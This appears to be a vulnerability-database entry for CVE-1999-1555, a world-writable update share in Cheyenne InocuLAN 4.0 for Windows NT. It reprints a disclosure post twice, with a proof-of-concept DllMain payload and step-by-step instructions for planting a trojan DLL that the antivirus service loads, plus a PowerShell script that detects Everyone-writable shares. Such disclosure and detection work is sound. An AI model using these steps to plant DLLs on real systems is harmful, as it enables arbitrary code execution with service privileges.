CVE-1999-1555
CVSS7.2
Published: 1998-06-11 00:00:00
Revised: 2016-11-28 14:06:06

[Original] Cheyenne InocuLAN Anti-Virus Server in Inoculan 4.0 before Service Pack 2 creates an update directory with "EVERYONE FULL CONTROL" permissions, which allows local users to cause Inoculan's antivirus update feature to install a Trojan horse dll.


[CNNVD] Cheyenne InocuLAN Windows NT Share Vulnerability (CNNVD-199806-012)

Cheyenne InocuLAN Anti-Virus Server in Inoculan 4.0 before Service Pack 2 creates an update directory with "EVERYONE FULL CONTROL" permissions; a local user can exploit this to make Inoculan's antivirus update feature install a Trojan horse DLL.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in complete system shutdown]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1555
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1555
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199806-012
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/9515
(VENDOR_ADVISORY)  BUGTRAQ  19980611 Cheyenne Inoculan vulnerability on NT
http://www.securityfocus.com/bid/106
(UNKNOWN)  BID  106
http://xforce.iss.net/static/1536.php
(VENDOR_ADVISORY)  XF  inoculan-bad-permissions(1536)

- Vulnerability information

Cheyenne InocuLAN Windows NT Share Vulnerability
High Unknown
1998-06-11 00:00:00 2005-10-20 00:00:00
Remote
Cheyenne InocuLAN Anti-Virus Server in Inoculan 4.0 before Service Pack 2 creates an update directory with "EVERYONE FULL CONTROL" permissions; a local user can exploit this to make Inoculan's antivirus update feature install a Trojan horse DLL.

- Advisories and patches

Go to http://www.cheyenne.com/CheyTech/Download/patches/techptch.html and install their latest patch.

- Vulnerability information (19083)

Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability (EDBID:19083)
windows remote
1998-06-10 Verified
0 Paul Boyer
N/A
source: http://www.securityfocus.com/bid/106/info

It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2.

Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server". When it starts, it replaces any shared directory with the same name and shares "CHEYUPD$" with full control for the everyone group.

When the service starts, it does an update check in this directory (usually "C:\Inoculan\Update\") using the files "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and [idem]...\avh32dll.dll

Simply "touching" or modifying the file "filelist.txt" to look younger than real causes the update. The update causes the service to stop, the avh32dll.dll DLL to replace the existing one (usually in c:\inoculan\avh32dll.dll) and then starts the service again. When the service starts, it loads the DLL into memory, and THEN does a lot of stuff (including checking if it is a valid DLL, I presume).

You can write a DLL that executes arbitrary code at the time it is loaded in memory, at the precise time when DllMain is called by the image loader, before any other function has a chance to be called.

To check if you are vulnerable, if you have the resource kit installed, run

SRVCHECK.EXE \\<YourMachine>

else run srvmgr.exe from an NT server on the same domain, select <YourMachine> and select "Computer|Shared Directories".

If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to the "EVERYONE" group, you are vulnerable.

An interesting point is that Inoculan uses "domains". In one domain, a single server forwards the updates to all machines participating in that "domain" (nothing to do with NT domains). It may be possible to write the trojan DLL to the domain's server CHEYUPD$ shared directory, and have it copy it to all the machines in the domain.

inoctroj.cpp:
-------Cut here -----------
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Proof-of-concept payload DLL from the original post, built as avh32dll.dll.
// The body runs when the image loader calls DllMain, before any exported
// function can be called; here it only creates a marker file in the C: root.
BOOL WINAPI DllMain (HINSTANCE, DWORD, LPVOID)
{
    // Any code can go here. This is an example:
    // it simply creates a file in the C: drive root directory
    // and writes "hello world !" into it.
    const char * buf = "hello world ! ";

    // create the marker file
    FILE * demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
    if (demo != NULL)
    {
        // write to the file (the string bytes only, not the terminating NUL)
        fwrite ( buf, 1, strlen (buf), demo);
        fclose ( demo );
    }

    // Returning FALSE aborts the DLL loading. Anyway, we're done at that time ;))
    return FALSE;
}

-------Cut here -----------

Compile and link to make the target avh32dll.dll. Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\, touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer than it currently is. Wait for the user to stop and restart the InocuLAN server, or for them to reboot.

- Vulnerability information

13562
Cheyenne InocuLAN Anti-Virus Server update Directory Permission Weakness
Loss of Integrity Patch / RCS, Upgrade
Vendor Verified

- Vulnerability description

- Timeline

1998-06-11 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Cheyenne InocuLAN Windows NT Share Vulnerability
Unknown 106
Yes No
1998-06-10 12:00:00 2009-07-11 12:16:00
This vulnerability was found by Paul Boyer <p__boyer@usa.net> and reported to the BugTraq mailing list.

- Affected program versions

Cheyenne Inoculan for Windows NT 4.0

- Vulnerability discussion

It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2.

Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server". When it starts, it replaces any shared directory with the same name and shares "CHEYUPD$" with full control for the everyone group.

When the service starts, it does an update check in this directory (usually "C:\Inoculan\Update\") using the files "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and [idem]...\avh32dll.dll

Simply "touching" or modifying the file "filelist.txt" to look younger than real causes the update. The update causes the service to stop, the avh32dll.dll DLL to replace the existing one (usually in c:\inoculan\avh32dll.dll) and then starts the service again. When the service starts, it loads the DLL into memory, and THEN does a lot of stuff (including checking if it is a valid DLL, I presume).

You can write a DLL that executes arbitrary code at the time it is loaded in memory, at the precise time when DllMain is called by the image loader, before any other function has a chance to be called.

To check if you are vulnerable, if you have the resource kit installed, run

SRVCHECK.EXE \\<YourMachine>

else run srvmgr.exe from an NT server on the same domain, select <YourMachine> and select "Computer|Shared Directories".

If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to the "EVERYONE" group, you are vulnerable.

An interesting point is that Inoculan uses "domains". In one domain, a single server forwards the updates to all machines participating in that "domain" (nothing to do with NT domains). It may be possible to write the trojan DLL to the domain's server CHEYUPD$ shared directory, and have it copy it to all the machines in the domain.
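The vulnerability check in the post (a "CHEYUPD$" share granting the Everyone group full control) is the condition an administrator would want to sweep for across a fleet. The PowerShell below is an added example for this record, not part of Paul Boyer's post and not Cheyenne or CA tooling: it lists non-administrative SMB shares whose share-level ACL allows Everyone Full or Change access, and marks any whose name is on a watch list (CHEYUPD$ by default). It assumes a Windows host with the SmbShare module (Windows 8 / Server 2012 or later); the SRVCHECK.EXE and srvmgr.exe steps above are the NT 4.0 equivalents. The function name Get-EveryoneWritableShare and its parameters are this example's own.

```powershell
# Added example (not from the original advisory or vendor): report SMB shares whose
# share-level ACL grants the Everyone group Full or Change access, the weak setting
# the advisory describes for CHEYUPD$. Requires the SmbShare module (Windows 8 /
# Server 2012 or later). Function and parameter names are this example's own.
function Get-EveryoneWritableShare {
    [CmdletBinding()]
    param(
        # Share names worth calling out explicitly; CHEYUPD$ is the one from the advisory.
        [string[]]$WatchList = @('CHEYUPD$'),

        # Optional CIM session(s) for checking remote hosts (New-CimSession -ComputerName ...).
        [Microsoft.Management.Infrastructure.CimSession[]]$CimSession
    )

    $cim = @{}
    if ($CimSession) { $cim['CimSession'] = $CimSession }

    # Skip the built-in administrative shares (C$, ADMIN$, IPC$); they are not
    # application-created and are not what this check is about.
    $shares = Get-SmbShare @cim | Where-Object { -not $_.Special }

    foreach ($share in $shares) {
        foreach ($ace in (Get-SmbShareAccess -Name $share.Name @cim)) {
            $isEveryone = $ace.AccountName -match '(^|\\)Everyone$'
            $isAllow    = "$($ace.AccessControlType)" -eq 'Allow'
            $isWritable = "$($ace.AccessRight)" -in @('Full', 'Change')

            if ($isEveryone -and $isAllow -and $isWritable) {
                [pscustomobject]@{
                    Share       = $share.Name
                    Path        = $share.Path
                    Account     = $ace.AccountName
                    AccessRight = "$($ace.AccessRight)"
                    OnWatchList = ($share.Name -in $WatchList)
                }
            }
        }
    }
}

# Usage: list offending shares, watch-listed ones first.
Get-EveryoneWritableShare | Sort-Object OnWatchList -Descending | Format-Table -AutoSize
```

Because the post notes that the service re-creates the share with these permissions every time it starts, a hit on CHEYUPD$ is a reason to apply the vendor patch, not just to tighten the share ACL by hand; the same report is useful more generally, since any share writable by Everyone that a privileged service later reads from carries the same class of risk.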

- Exploit

inoctroj.cpp:
-------Cut here -----------
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Proof-of-concept payload DLL from the original post, built as avh32dll.dll.
// The body runs when the image loader calls DllMain, before any exported
// function can be called; here it only creates a marker file in the C: root.
BOOL WINAPI DllMain (HINSTANCE, DWORD, LPVOID)
{
    // Any code can go here. This is an example:
    // it simply creates a file in the C: drive root directory
    // and writes "hello world !" into it.
    const char * buf = "hello world ! ";

    // create the marker file
    FILE * demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
    if (demo != NULL)
    {
        // write to the file (the string bytes only, not the terminating NUL)
        fwrite ( buf, 1, strlen (buf), demo);
        fclose ( demo );
    }

    // Returning FALSE aborts the DLL loading. Anyway, we're done at that time ;))
    return FALSE;
}

-------Cut here -----------

Compile and link to make the target avh32dll.dll. Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\, touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer than it currently is. Wait for the user to stop and restart the InocuLAN server, or for them to reboot.

- Solution

Go to http://www.cheyenne.com/CheyTech/Download/patches/techptch.html and
install their latest patch.

- Related references
